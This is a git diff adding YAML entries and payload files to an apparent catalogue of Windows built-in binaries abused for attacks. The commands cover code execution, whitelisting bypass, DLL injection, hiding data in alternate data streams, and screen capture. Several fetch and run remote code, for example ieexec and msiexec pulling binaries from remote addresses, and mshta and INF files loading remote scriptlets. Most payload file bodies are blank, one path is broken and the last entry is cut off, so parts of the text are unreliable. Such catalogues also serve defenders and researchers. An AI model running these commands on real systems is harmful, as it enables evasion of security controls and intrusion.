+Name: Gpscript.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Gpscript /logon + Description: 'Executes logon scripts configured in Group Policy.' + - Command: Gpscript /startup + Description: 'Executes startup scripts configured in Group Policy.' +Full Path: + - c:\windows\system32\gpscript.exe + - c:\windows\sysWOW64\gpscript.exe +Code Sample: [] +Detection: [] +Resources: + - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ +Notes: | + Thanks to Oddvar Moe - @oddvarmoe + Requires administrative rights and modifications to local group policy settings. + diff --git a/OSBinaries/Hh.yml b/OSBinaries/Hh.yml new file mode 100644 index 0000000..8f58fe0 --- /dev/null +++ b/OSBinaries/Hh.yml 
@@ -0,0 +1,23 @@ +--- +Name: hh.exe +Description: Download, Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: HH.exe http://www.google.com + Description: Opens google's web page with HTML Help. + - Command: HH.exe C:\ + Description: Opens c:\\ with HTML Help. + - Command: HH.exe c:\windows\system32\calc.exe + Description: 'Opens calc.exe with HTML Help.' + - Command: HH.exe http://some.url/script.ps1 + Description: Open the target PowerShell script with HTML Help. +Full Path: + - c:\windows\system32\hh.exe + - c:\windows\sysWOW64\hh.exe +Code Sample: [] +Detection: [] +Resources: + - https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ +Notes: Thanks to Oddvar Moe - @oddvarmoe diff --git a/OSBinaries/Ie4unit.yml b/OSBinaries/Ie4unit.yml new file mode 100644 index 0000000..f0ca116 --- /dev/null +++ b/OSBinaries/Ie4unit.yml @@ -0,0 +1,20 @@ +--- +Name: Ie4unit.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: ie4unit.exe -BaseSettings + Description: 'Executes commands from a specially prepared ie4uinit.inf file.' +Full Path: + - 'c:\windows\system32\ie4unit.exe ' + - 'c:\windows\sysWOW64\ie4unit.exe ' + - 'c:\windows\system32\ieuinit.inf ' + - 'c:\windows\sysWOW64\ieuinit.inf ' +Code Sample: [] +Detection: [] +Resources: + - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ +Notes: Thanks to Jimmy - @bohops + diff --git a/OSBinaries/Ieexec.yml b/OSBinaries/Ieexec.yml new file mode 100644 index 0000000..a31f8c5 --- /dev/null +++ b/OSBinaries/Ieexec.yml 
@@ -0,0 +1,18 @@ +--- +Name: IEExec.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: 'Executes bypass.exe from the remote server.' +Full Path: + - c:\windows\system32\ieexec.exe + - c:\windows\sysWOW64\ieexec.exe +Code Sample: [] +Detection: [] +Resources: + - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ +Notes: Thanks to Casey Smith - @subtee + diff --git a/OSBinaries/Infdefaultinstall.yml b/OSBinaries/Infdefaultinstall.yml new file mode 100644 index 0000000..e1d6e54 --- /dev/null +++ b/OSBinaries/Infdefaultinstall.yml @@ -0,0 +1,20 @@ +--- +Name: InfDefaultInstall.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: InfDefaultInstall.exe Infdefaultinstall.inf + Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.' +Full Path: + - c:\windows\system32\Infdefaultinstall.exe + - c:\windows\sysWOW64\Infdefaultinstall.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/KyleHanslovan/status/911997635455852544 + - https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a + - https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ +Notes: Thanks to Kyle Hanslovan - @kylehanslovan + diff --git a/OSBinaries/Installutil.yml b/OSBinaries/Installutil.yml new file mode 100644 index 0000000..2f575c3 --- /dev/null +++ b/OSBinaries/Installutil.yml 
@@ -0,0 +1,25 @@ +--- +Name: InstallUtil.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + Description: 'Execute the target .NET DLL or EXE.' +Full Path: + - C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe + - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe + - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe + - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe +Code Sample: [] +Detection: [] +Resources: + - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ + - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 + - http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md + - https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ + - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +Notes: Thanks to Casey Smith - @subtee + diff --git a/OSBinaries/Makecab.yml b/OSBinaries/Makecab.yml new file mode 100644 index 0000000..210e4eb --- /dev/null +++ b/OSBinaries/Makecab.yml 
@@ -0,0 +1,22 @@ +--- +Name: Makecab.exe +Description: Package, Add ADS, Download +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab + Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. + - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab + Description: Compresses the target file and stores it in the target file. + - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab + Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. +Full Path: + - c:\windows\system32\makecab.exe + - c:\windows\sysWOW64\makecab.exe +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Notes: Thanks to Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Mavinject.yml b/OSBinaries/Mavinject.yml new file mode 100644 index 0000000..deb4bb3 --- /dev/null +++ b/OSBinaries/Mavinject.yml @@ -0,0 +1,22 @@ +--- +Name: Mavinject.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll + Description: Inject evil.dll into a process with PID 3110. + - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" + Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. +Full Path: + - C:\Windows\System32\mavinject.exe + - C:\Windows\SysWOW64\mavinject.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/gN3mes1s/status/941315826107510784 + - https://twitter.com/Hexcorn/status/776122138063409152 + - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe + 
diff --git a/OSBinaries/Msbuild.yml b/OSBinaries/Msbuild.yml new file mode 100644 index 0000000..336c5fc --- /dev/null +++ b/OSBinaries/Msbuild.yml @@ -0,0 +1,27 @@ +--- +Name: Msbuild.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: msbuild.exe pshell.xml + Description: Build and execute a C# project stored in the target XML file. + - Command: msbuild.exe Msbuild.csproj + Description: Build and execute a C# project stored in the target CSPROJ file. +Full Path: + - C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe + - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe + - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe + - C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe + - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe + - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe +Code Sample: [] +Detection: [] +Resources: + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md + - https://github.com/Cn33liz/MSBuildShell + - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ + - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis + diff --git a/OSBinaries/Msconfig.yml b/OSBinaries/Msconfig.yml new file mode 100644 index 0000000..823b57a --- /dev/null +++ b/OSBinaries/Msconfig.yml @@ -0,0 +1,19 @@ +--- +Name: Msconfig.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Msconfig.exe -5 + Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. +Full Path: + - c:\windows\system32\msconfig.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/991314564896690177 +Notes: | + Thanks to Pierre-Alexandre Braeken - @pabraeken + See the Payloads folder for an example mscfgtlc.xml file. + 
diff --git a/OSBinaries/Msdt.yml b/OSBinaries/Msdt.yml new file mode 100644 index 0000000..1ecd5bf --- /dev/null +++ b/OSBinaries/Msdt.yml @@ -0,0 +1,25 @@ +--- +Name: Msdt.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Open .diagcab package + Description: '' + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml + /skip TRUE + Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. +Full Path: + - 'C:\Windows\System32\Msdt.exe ' + - 'C:\Windows\SysWOW64\Msdt.exe ' +Code Sample: [] +Detection: [] +Resources: + - https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ + - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ + - https://twitter.com/harr0ey/status/991338229952598016 +Notes: | + Thanks to: + See the Payloads folder for an example PCW8E57.xml file. + diff --git a/OSBinaries/Mshta.yml b/OSBinaries/Mshta.yml new file mode 100644 index 0000000..c4c4f6a --- /dev/null +++ b/OSBinaries/Mshta.yml 
@@ -0,0 +1,28 @@ +--- +Name: mshta.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: mshta.exe evilfile.hta + Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. + - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) + Description: Executes VBScript supplied as a command line argument. + - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); + Description: Executes JavaScript supplied as a command line argument. + - Command: mshta.exe "C:\ads\file.txt:file.hta" + Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. +Full Path: + - C:\Windows\System32\mshta.exe + - C:\Windows\SysWOW64\mshta.exe +Code Sample: [] +Detection: [] +Resources: + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md + - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct + - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ + - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Msiexec.yml b/OSBinaries/Msiexec.yml new file mode 100644 index 0000000..d1dbd56 --- /dev/null +++ b/OSBinaries/Msiexec.yml 
@@ -0,0 +1,25 @@ +--- +Name: Msiexec.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: msiexec /quiet /i cmd.msi + Description: Installs the target .MSI file silently. + - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png + Description: Installs the target remote & renamed .MSI file silently. + - Command: msiexec /y "C:\folder\evil.dll" + Description: Calls DLLRegisterServer to register the target DLL. + - Command: msiexec /z "C:\folder\evil.dll" + Description: Calls DLLRegisterServer to un-register the target DLL. +Full Path: + - c:\windows\system32\msiexec.exe + - c:\windows\sysWOW64\msiexec.exe +Code Sample: [] +Detection: [] +Resources: + - https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ + - https://twitter.com/PhilipTsukerman/status/992021361106268161 +Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman + diff --git a/OSBinaries/Netsh.yml b/OSBinaries/Netsh.yml new file mode 100644 index 0000000..0e29291 --- /dev/null +++ b/OSBinaries/Netsh.yml 
@@ -0,0 +1,28 @@ +--- +Name: Netsh.exe +Description: Execute, Surveillance +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: | + netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() + netsh.exe trace show status + Description: Capture network traffic on remote file share. + - Command: netsh.exe add helper C:\Path\file.dll + Description: Load (execute) NetSh.exe helper DLL file. + - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 + Description: Forward traffic from the listening address and proxy to a remote system. +Full Path: + - C:\Windows\System32 +etsh.exe + - C:\Windows\SysWOW64 +etsh.exe +Code Sample: [] +Detection: [] +Resources: + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md + - https://attack.mitre.org/wiki/Technique/T1128 + - https://twitter.com/teemuluotio/status/990532938952527873 +Notes: '' + diff --git a/OSBinaries/Nltest.yml b/OSBinaries/Nltest.yml new file mode 100644 index 0000000..16aeb81 --- /dev/null +++ b/OSBinaries/Nltest.yml @@ -0,0 +1,17 @@ +--- +Name: Nltest.exe +Description: Credentials +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: nltest.exe /SERVER:192.168.1.10 /QUERY + Description: '' +Full Path: + - c:\windows\system32\nltest.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/sysopfb/status/986799053668139009 + - https://ss64.com/nt/nltest.html +Notes: Thanks to Sysopfb - @sysopfb diff --git a/OSBinaries/Odbcconf.yml b/OSBinaries/Odbcconf.yml new file mode 100644 index 0000000..93a9ee6 --- /dev/null +++ b/OSBinaries/Odbcconf.yml 
@@ -0,0 +1,22 @@ +--- +Name: odbcconf.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: odbcconf -f file.rsp + Description: Load DLL specified in target .RSP file. +Full Path: + - 'c:\windows\system32\odbcconf.exe ' + - c:\windows\sysWOW64\odbcconf.exe +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b + - https://github.com/woanware/application-restriction-bypasses + - https://twitter.com/subTee/status/789459826367606784 +Notes: | + Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer + See the Playloads folder for an example .RSP file. + diff --git a/OSBinaries/Openwith.yml b/OSBinaries/Openwith.yml new file mode 100644 index 0000000..9f91ba1 --- /dev/null +++ b/OSBinaries/Openwith.yml @@ -0,0 +1,20 @@ +--- +Name: Openwith.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: OpenWith.exe /c C:\test.hta + Description: Opens the target file with the default application. + - Command: OpenWith.exe /c C:\testing.msi + Description: Opens the target file with the default application. +Full Path: + - c:\windows\system32\Openwith.exe + - c:\windows\sysWOW64\Openwith.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/harr0ey/status/991670870384021504 +Notes: Thanks to Matt harr0ey - @harr0ey + diff --git a/OSBinaries/Payload/Cmstp.inf b/OSBinaries/Payload/Cmstp.inf new file mode 100644 index 0000000..077bb2e --- /dev/null +++ b/OSBinaries/Payload/Cmstp.inf @@ -0,0 +1,14 @@ +[version] +Signature=$chicago$ +AdvancedINF=2.5 + +[DefaultInstall_SingleUser] +UnRegisterOCXs=UnRegisterOCXSection + +[UnRegisterOCXSection] +%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct + +[Strings] +AppAct = "SOFTWARE\Microsoft\Connection Manager" +ServiceName="Yay" +ShortSvcName="Yay" \ No newline at end of file 
diff --git a/OSBinaries/Payload/Cmstp_calc.sct b/OSBinaries/Payload/Cmstp_calc.sct new file mode 100644 index 0000000..74a556e --- /dev/null +++ b/OSBinaries/Payload/Cmstp_calc.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/OSBinaries/Payload/Evil.xbap b/OSBinaries/Payload/Evil.xbap new file mode 100644 index 0000000..3046680 --- /dev/null +++ b/OSBinaries/Payload/Evil.xbap @@ -0,0 +1,8 @@ +private void Button_click(object sender, RoutedEventArgs e) +{ + if (RadioButton1.IsChecked == true) + { + Process.Start("C:\\poc\\evil.exe"); + MessageBox.Show("BHello."); + } +} diff --git a/OSBinaries/Payload/Infdefaultinstall.inf b/OSBinaries/Payload/Infdefaultinstall.inf new file mode 100644 index 0000000..43acce3 --- /dev/null +++ b/OSBinaries/Payload/Infdefaultinstall.inf @@ -0,0 +1,8 @@ +[Version] +Signature=$CHICAGO$ + +[DefaultInstall] +UnregisterDlls = Squiblydoo + +[Squiblydoo] +11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct \ No newline at end of file diff --git a/OSBinaries/Payload/Infdefaultinstall_calc.sct b/OSBinaries/Payload/Infdefaultinstall_calc.sct new file mode 100644 index 0000000..0a58650 --- /dev/null +++ b/OSBinaries/Payload/Infdefaultinstall_calc.sct @@ -0,0 +1,16 @@ + + + + + + + + \ No newline at end of file diff --git a/OSBinaries/Payload/Msbuild.csproj b/OSBinaries/Payload/Msbuild.csproj new file mode 100644 index 0000000..a10642c --- /dev/null +++ b/OSBinaries/Payload/Msbuild.csproj @@ -0,0 +1,47 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/OSBinaries/Payload/Mshta_calc.sct b/OSBinaries/Payload/Mshta_calc.sct new file mode 100644 index 0000000..6ccac30 --- /dev/null +++ b/OSBinaries/Payload/Mshta_calc.sct @@ -0,0 +1,43 @@ + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file 
diff --git a/OSBinaries/Payload/PCW8E57.xml b/OSBinaries/Payload/PCW8E57.xml new file mode 100644 index 0000000..bf3dea5 --- /dev/null +++ b/OSBinaries/Payload/PCW8E57.xml @@ -0,0 +1,13 @@ + + + + + ContextMenu + + + NotListed + + + C:\Windows\assembly\Exec-Execute.msi + + diff --git a/OSBinaries/Payload/Regsvr32_calc.sct b/OSBinaries/Payload/Regsvr32_calc.sct new file mode 100644 index 0000000..74a556e --- /dev/null +++ b/OSBinaries/Payload/Regsvr32_calc.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/OSBinaries/Payload/Wmic_calc.xsl b/OSBinaries/Payload/Wmic_calc.xsl new file mode 100644 index 0000000..b405524 --- /dev/null +++ b/OSBinaries/Payload/Wmic_calc.xsl @@ -0,0 +1,11 @@ + + + + + + \ No newline at end of file diff --git a/OSBinaries/Payload/file.rsp b/OSBinaries/Payload/file.rsp new file mode 100644 index 0000000..1d7b8bd --- /dev/null +++ b/OSBinaries/Payload/file.rsp @@ -0,0 +1 @@ +REGSVR evil.dll diff --git a/OSBinaries/Payload/mscfgtlc.xml b/OSBinaries/Payload/mscfgtlc.xml new file mode 100644 index 0000000..a84f356 --- /dev/null +++ b/OSBinaries/Payload/mscfgtlc.xml @@ -0,0 +1,4 @@ + + + + diff --git a/OSBinaries/Pcalua.yml b/OSBinaries/Pcalua.yml new file mode 100644 index 0000000..147f003 --- /dev/null +++ b/OSBinaries/Pcalua.yml 
@@ -0,0 +1,24 @@ +--- +Name: Pcalua.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: pcalua.exe -a calc.exe + Description: Open the target .EXE using the Program Compatibility Assistant. + - Command: pcalua.exe -a \\server\payload.dll + Description: Open the target .DLL file with the Program Compatibilty Assistant. + - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java + Description: Open the target .CPL file with the Program Compatibility Assistant. +Full Path: + - c:\windows\system32\pcalua.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/KyleHanslovan/status/912659279806640128 +Notes: | + Thanks to: + fab - @0rbz_ + Kyle Hanslovan - @KyleHanslovan + diff --git a/OSBinaries/Pcwrun.yml b/OSBinaries/Pcwrun.yml new file mode 100644 index 0000000..2afd5db --- /dev/null +++ b/OSBinaries/Pcwrun.yml @@ -0,0 +1,17 @@ +--- +Name: Pcwrun.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Pcwrun.exe c:\temp\beacon.exe + Description: Open the target .EXE file with the Program Compatibility Wizard. +Full Path: + - c:\windows\system32\pcwrun.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/991335019833708544 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken + diff --git a/OSBinaries/Powershell.yml b/OSBinaries/Powershell.yml new file mode 100644 index 0000000..c62bf48 --- /dev/null +++ b/OSBinaries/Powershell.yml 
@@ -0,0 +1,18 @@ +--- +Name: Powershell.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: powershell -ep bypass - < c:\temp:ttt + Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). +Full Path: + - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe + - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/Moriarty_Meng/status/984380793383370752 +Notes: Thanks to Moriarty - @Moriarty_Meng + diff --git a/OSBinaries/Presentationhost.yml b/OSBinaries/Presentationhost.yml new file mode 100644 index 0000000..4461ccc --- /dev/null +++ b/OSBinaries/Presentationhost.yml @@ -0,0 +1,19 @@ +--- +Name: PresentationHost.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Presentationhost.exe C:\temp\Evil.xbap + Description: Executes the target XAML Browser Application (XBAP) file. +Full Path: + - 'c:\windows\system32\PresentationHost.exe ' + - 'c:\windows\sysWOW64\PresentationHost.exe ' +Code Sample: [] +Detection: [] +Resources: + - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ +Notes: Thanks to Casey Smith - @subtee + diff --git a/OSBinaries/Print.yml b/OSBinaries/Print.yml new file mode 100644 index 0000000..2dca5c2 --- /dev/null +++ b/OSBinaries/Print.yml 
@@ -0,0 +1,23 @@ +--- +Name: Print.exe +Description: Download, Copy, Add ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe + Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. + - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe + Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe + - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe + Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. +Full Path: + - C:\Windows\System32\print.exe + - C:\Windows\SysWOW64\print.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/Oddvarmoe/status/985518877076541440 + - https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 +Notes: Thanks to Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Psr.yml b/OSBinaries/Psr.yml new file mode 100644 index 0000000..32a4b1e --- /dev/null +++ b/OSBinaries/Psr.yml @@ -0,0 +1,22 @@ +--- +Name: Psr.exe +Description: Surveillance +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip + Description: Capture screenshots of the desktop and save them in the target .ZIP file. + - Command: psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip + Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file. + - Command: psr.exe /stop + Description: Stop the Problem Step Recorder. +Full Path: + - C:\Windows\System32\Psr.exe + - C:\Windows\SysWOW64\Psr.exe +Code Sample: [] +Detection: [] +Resources: + - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf +Notes: 'Thanks to ' + diff --git a/OSBinaries/Reg.yml b/OSBinaries/Reg.yml new file mode 100644 index 0000000..90eb292 --- /dev/null +++ b/OSBinaries/Reg.yml 
@@ -0,0 +1,18 @@ +--- +Name: reg.exe +Description: Export Reg, Add ADS, Import Reg +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg + Description: Export the target Registry key and save it to the specified .REG file. +Full Path: + - c:\windows\system32\reg.exe + - c:\windows\sysWOW64\reg.exe +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Notes: Thanks to Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Regasm.yml b/OSBinaries/Regasm.yml new file mode 100644 index 0000000..04d1966 --- /dev/null +++ b/OSBinaries/Regasm.yml @@ -0,0 +1,25 @@ +--- +Name: Regasm.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: regasm.exe /U AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the UnRegisterClass function. + - Command: regasm.exe AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the RegisterClass function. +Full Path: + - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe + - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe + - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe + - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe +Code Sample: [] +Detection: [] +Resources: + - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md + - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +Notes: Thanks to Casey Smith - @subtee + diff --git a/OSBinaries/Regedit.yml b/OSBinaries/Regedit.yml new file mode 100644 index 0000000..b88def4 --- /dev/null +++ b/OSBinaries/Regedit.yml 
@@ -0,0 +1,20 @@ +--- +Name: regedit.exe +Description: Write ADS, Read ADS, Import registry +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey + Description: Export the target Registry key to the specified .REG file. + - Command: regedit C:\ads\file.txt:regfile.reg" + Description: Import the target .REG file into the Registry. +Full Path: + - C:\Windows\System32\regedit.exe + - C:\Windows\SysWOW64\regedit.exe +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Notes: Thanks to Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Register-cimprovider.yml b/OSBinaries/Register-cimprovider.yml new file mode 100644 index 0000000..0db2e3e --- /dev/null +++ b/OSBinaries/Register-cimprovider.yml @@ -0,0 +1,18 @@ +--- +Name: Register-cimprovider.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Register-cimprovider -path "C:\folder\evil.dll" + Description: Load the target .DLL. +Full Path: + - c:\windows\system32\Register-cimprovider.exe + - c:\windows\sysWOW64\Register-cimprovider.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/PhilipTsukerman/status/992021361106268161 +Notes: Thanks to PhilipTsukerman - @PhilipTsukerman + diff --git a/OSBinaries/Regsvcs.yml b/OSBinaries/Regsvcs.yml new file mode 100644 index 0000000..685d988 --- /dev/null +++ b/OSBinaries/Regsvcs.yml 
@@ -0,0 +1,23 @@ +--- +Name: Regsvcs.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: regsvcs.exe AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the RegisterClass function. +Full Path: + - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe + - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe + - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe + - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe +Code Sample: [] +Detection: [] +Resources: + - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md + - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +Notes: 